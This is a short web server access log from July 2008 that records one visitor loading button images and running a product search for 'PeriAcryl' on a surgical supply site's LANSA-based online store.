76.73.202.136 - - [20/Jul/2008:02:53:05 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21"
76.73.202.136 - - [20/Jul/2008:02:53:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21"
76.73.202.136 - - [20/Jul/2008:02:53:32 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):PeriAcryl HTTP/1.1" 200 51419 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21"
76.73.202.136 - - [20/Jul/2008:02:53:33 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):PeriAcryl" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21"
76.73.202.136 - - [20/Jul/2008:02:53:33 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):PeriAcryl" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21"
76.73.202.136 - - [20/Jul/2008:02:53:33 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):PeriAcryl" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21"
76.73.202.136 - - [20/Jul/2008:02:53:33 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):PeriAcryl" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21"
76.73.202.136 - - [20/Jul/2008:02:53:33 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):PeriAcryl" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21"
